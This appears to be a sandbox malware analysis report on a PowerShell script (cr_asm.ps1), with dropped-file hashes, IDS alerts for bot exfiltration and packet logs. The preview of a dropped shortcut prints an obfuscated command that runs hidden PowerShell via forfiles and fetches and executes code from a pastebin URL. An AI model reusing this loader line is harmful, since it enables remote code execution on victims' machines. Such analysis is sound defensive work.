                                                                                              na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                              • 185.199.108.133
                                                                                              • 172.67.19.24
                                                                                              • 162.159.138.232
                                                                                              na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                              • 185.199.108.133
                                                                                              • 172.67.19.24
                                                                                              • 162.159.138.232
                                                                                              LISTA DE COTIZACIONES.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 185.199.108.133
                                                                                              • 172.67.19.24
                                                                                              • 162.159.138.232
                                                                                              https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=janice.atkins@faa.govGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 185.199.108.133
                                                                                              • 172.67.19.24
                                                                                              • 162.159.138.232
                                                                                              PO-10-15-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 185.199.108.133
                                                                                              • 172.67.19.24
                                                                                              • 162.159.138.232
                                                                                              https://landing-cs.mailcomms.io/73C4D162CAD9C4016A99EC5AF537DA57B4F5451828F0865A7DC8EA34ED2492F0Get hashmaliciousUnknownBrowse
                                                                                              • 185.199.108.133
                                                                                              • 172.67.19.24
                                                                                              • 162.159.138.232
                                                                                              https://www.filmize.art/azacGet hashmaliciousUnknownBrowse
                                                                                              • 185.199.108.133
                                                                                              • 172.67.19.24
                                                                                              • 162.159.138.232
                                                                                              r8k29DBraE.exeGet hashmaliciousXWormBrowse
                                                                                              • 185.199.108.133
                                                                                              • 172.67.19.24
                                                                                              • 162.159.138.232
                                                                                              Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                              • 185.199.108.133
                                                                                              • 172.67.19.24
                                                                                              • 162.159.138.232

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                                                              Category:dropped
                                                                                              Size (bytes):1728
                                                                                              Entropy (8bit):4.527272298423835
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                                                              MD5:724AA21828AD912CB466E3B0A79F478B
                                                                                              SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                                                              SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                                                              SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                                                              Malicious:true
                                                                                              Reputation:low
                                                                                              Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):11608
                                                                                              Entropy (8bit):4.890472898059848
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                              Malicious:false
                                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):1.1940658735648508
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:NlllulLll/Z:NllUR
                                                                                              MD5:34EA4B2390DB574C2A6DDF06EB63BC2C
                                                                                              SHA1:E11B6A3964EA6515EF04929C581B8C15F72F3BEE
                                                                                              SHA-256:2F6F13721F5FFF8B75BED4DAEE5F99B93EF58FE1BD28F25226F066792D4E763A
                                                                                              SHA-512:28687A1CD670E35384A96E071B723FA33A2BEE0BFEEB5113E8E210A5F324DCFB32422EDC211CB84A05D9AA55951741C69B0FFADF56083D673EF129D880C0276E
                                                                                              Malicious:false
                                                                                              Preview:@...e...............................[.. .............@..........

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jqyt4o1.b1m.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nz20spe.5ee.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avceappo.zcd.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dozako2z.cck.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbo5ktjd.ovd.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l32kjgmw.djo.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mphfrjut.pc5.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opkqtes5.yby.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yxd31zr0.riz.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zco4oxmx.muu.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0E4U1MWI26K6GXN2V5S4.temp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):6222
                                                                                              Entropy (8bit):3.6890178241662563
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:Y7PbylOCrbU2K+JUzukvhkvklCyw/n2qbaalz+7SogZoOKbaal7+7SogZoK1:gPb0OCUoRkvhkvCCtVbaaLHebaaTH1
                                                                                              MD5:626112B19AEB9FCC99FD9533FD6FEF84
                                                                                              SHA1:3EB745F06BDB157B10C7BC6EFDA3C28AED1842D1
                                                                                              SHA-256:7A55880F493925B3442F862BD445F69CE2566CF767461165BE788469999DE83E
                                                                                              SHA-512:FC6E3040925D0E124DA1BD31686822CD40AB4ACB52EC8539E47A8764FD51393D61CCF0645886049A3976C1B20CEE71E869612B33ABDE126F04B99EEAF6379EEA
                                                                                              Malicious:false
                                                                                              Preview:...................................FL..................F.".. ...d......'..k....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....~IBg.......k........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlOY{n....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....OY.n..Roaming.@......DWSlOY.n....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlOY{n....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW!r..Windows.@......DWSlOY{n....E......................x..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlOY{n....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlOY{n....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlOY.n....q...........

                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):6222
                                                                                              Entropy (8bit):3.6890178241662563
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:Y7PbylOCrbU2K+JUzukvhkvklCyw/n2qbaalz+7SogZoOKbaal7+7SogZoK1:gPb0OCUoRkvhkvCCtVbaaLHebaaTH1
                                                                                              MD5:626112B19AEB9FCC99FD9533FD6FEF84
                                                                                              SHA1:3EB745F06BDB157B10C7BC6EFDA3C28AED1842D1
                                                                                              SHA-256:7A55880F493925B3442F862BD445F69CE2566CF767461165BE788469999DE83E
                                                                                              SHA-512:FC6E3040925D0E124DA1BD31686822CD40AB4ACB52EC8539E47A8764FD51393D61CCF0645886049A3976C1B20CEE71E869612B33ABDE126F04B99EEAF6379EEA
                                                                                              Malicious:false
                                                                                              Preview:...................................FL..................F.".. ...d......'..k....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....~IBg.......k........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlOY{n....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....OY.n..Roaming.@......DWSlOY.n....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlOY{n....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW!r..Windows.@......DWSlOY{n....E......................x..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlOY{n....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlOY{n....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlOY.n....q...........

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:ASCII text, with very long lines (4783)
                                                                                              Entropy (8bit):4.464064716553058
                                                                                              TrID:
                                                                                                File name:cr_asm.ps1
                                                                                                File size:7'084 bytes
                                                                                                MD5:ad55efa7fa18623e107d6945bf6f6167
                                                                                                SHA1:9e8677a71ab2deb025102e0a189bfc008f6ef8b3
                                                                                                SHA256:415982006ceb36b43714fe259e96d6e2b1174a3441c5e3beb30fe479642c2d75
                                                                                                SHA512:a3fadacf4b39a0d671f93ddf52c52689f79a8038ff1fae836f4f3b235fb68f75fbbbd4f872cca8878d8ce16acdf1827685161750fdf9bd37f81afdb2da6d9e14
                                                                                                SSDEEP:96:MNM78Ck8ZNMc2J++KpFsB1UEb3CBqZz+E6tNMuaFh2Ig:+M7hMFwpFshbwqUdMT2J
                                                                                                TLSH:21E16571475097F4E480CBC5D06D72AB52BAC7A730A83D26DBE21E8B6C1AD9770385B2
                                                                                                File Content Preview:sleep 5..#$googoogaagaa = "$env:tmp\DriverDiag.dll".$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk".if (-Not (Test-Path $googoogaagaa)) {..$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User").$newPath = $c

                                                                                                File Icon

                                                                                                Icon Hash:3270d6baae77db44

                                                                                                Network Behavior

                                                                                                Suricata IDS Alerts

                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2024-10-15T15:52:32.753901+02002857658ETPRO MALWARE Win32/Fake Robux Bot Registration1192.168.2.549736162.159.138.232443TCP
                                                                                                2024-10-15T15:52:46.406820+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.549812162.159.138.232443TCP
                                                                                                2024-10-15T15:52:52.200537+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.549847162.159.138.232443TCP

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 15, 2024 15:52:28.723443985 CEST4971880192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:28.728410959 CEST8049718172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:28.728524923 CEST4971880192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:28.760510921 CEST4971880192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:28.766024113 CEST8049718172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:29.379018068 CEST8049718172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:29.388809919 CEST49724443192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:29.388914108 CEST44349724172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:29.389142036 CEST49724443192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:29.428752899 CEST4971880192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:29.495476007 CEST49724443192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:29.495562077 CEST44349724172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:30.134752035 CEST44349724172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:30.135019064 CEST49724443192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:30.141838074 CEST49724443192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:30.141855955 CEST44349724172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:30.142290115 CEST44349724172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:30.161813021 CEST49724443192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:30.207410097 CEST44349724172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:30.889060974 CEST44349724172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:30.889156103 CEST44349724172.67.19.24192.168.2.5
                                                                                                Oct 15, 2024 15:52:30.889288902 CEST49724443192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:31.190475941 CEST49724443192.168.2.5172.67.19.24
                                                                                                Oct 15, 2024 15:52:31.384768009 CEST4973580192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:31.390995026 CEST8049735185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:31.391081095 CEST4973580192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:31.391556025 CEST4973580192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:31.396562099 CEST8049735185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:31.579802990 CEST49736443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:31.579840899 CEST44349736162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:31.579942942 CEST49736443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:31.583234072 CEST49736443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:31.583256006 CEST44349736162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.227159977 CEST8049735185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.227202892 CEST8049735185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.227252960 CEST8049735185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.227277994 CEST4973580192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:32.227353096 CEST4973580192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:32.227437973 CEST4973580192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:32.228888035 CEST8049735185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.228976011 CEST4973580192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:32.232297897 CEST8049735185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.234855890 CEST49737443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:32.234899044 CEST44349737185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.234989882 CEST49737443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:32.235318899 CEST49737443192.168.2.5185.199.108.133
                                                                                                Oct 15, 2024 15:52:32.235337019 CEST44349737185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.241343975 CEST44349736162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.241442919 CEST49736443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:32.243674994 CEST49736443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:32.243686914 CEST44349736162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.243937016 CEST44349736162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.261926889 CEST49736443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:32.303420067 CEST44349736162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.388675928 CEST44349736162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.389142990 CEST49736443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:32.389152050 CEST44349736162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.753824949 CEST44349736162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.753966093 CEST44349736162.159.138.232192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.754153967 CEST49736443192.168.2.5162.159.138.232
                                                                                                Oct 15, 2024 15:52:32.846999884 CEST44349737185.199.108.133192.168.2.5
                                                                                                Oct 15, 2024 15:52:32.847081900 CEST49737443192.168.2.5185.199.108.133
